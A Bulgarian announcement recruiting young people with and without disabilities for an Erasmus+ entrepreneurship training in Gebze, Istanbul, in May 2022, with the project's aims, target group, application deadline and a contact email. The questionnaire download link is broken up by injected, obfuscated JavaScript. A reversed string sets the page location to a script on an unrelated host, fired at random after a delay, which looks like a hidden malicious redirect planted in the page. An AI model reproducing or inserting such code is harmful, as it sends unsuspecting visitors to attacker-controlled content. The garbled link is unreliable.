Набиране на участници за международно обучение по проект „Предприемачество за всички“, което ще се проведе в гр. Инстанбул, в периода 23-27.05.2022 г.

April 20, 2022 in ОТТ Новини

ДЗЗД Консорциум Иновативен Капитал, представляващо Офиса за Технологичен Трансфер (ТТО) Иновативен Капитал, в партньорство с EUROPEAN NETWORK ON INDEPENDENT LIVING BRUSSELS OFFICE (Белгия), Youth for U (Турция)и и водещ бенефициент Tubitak Marmara Teknokent (Турция) изпълнява проект:  „Предприемачество за всички“ № KA205-5BDDE056  финансиран от Еразъм +.

Проектът „Предприемачество за всички“ има за цел да насърчи и засили участието на младите хора с увреждания в икономическия живот и да идентифицира предизвикателства, бариери, както и възможни области за подобрение за насърчаване на предприемачеството сред тази целева група.

Целева група:  Основната целева група са младите хора с увреждания до 35 годишна възраст, с различни нужди от достъпност и интересуващи се от предприемачество, включително социално предприемачество. Въпреки това, от друга страна, поради цялостният подход на проекта, младите хора без увреждания също са целева група.

От 23.05.2022 г. до 27.05.2022 г. в Гебзе, Инстанбул ще се проведе международно обучения по предприемачество, подходящо за млади хора с и без увреждания.

to-sofia.com/wp-content/uploads/2022/04/Personal_Questionaire_Enterpreneurship-for-all.toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}docx">Personal_Questionaire_Enterpreneurship for all

Желаещите да се включат в проекта и да вземат участие в предстоящото обучение могат да заявят участие до 05.05.2022 г., като изпратят попълнена и подписана заявка за участие на имейл адрес: consultationofficecenter@gmail.com, която ще видите прикачена под публикацията.

От Екипа на ДЗЗД Консорциум Иновативен Капитал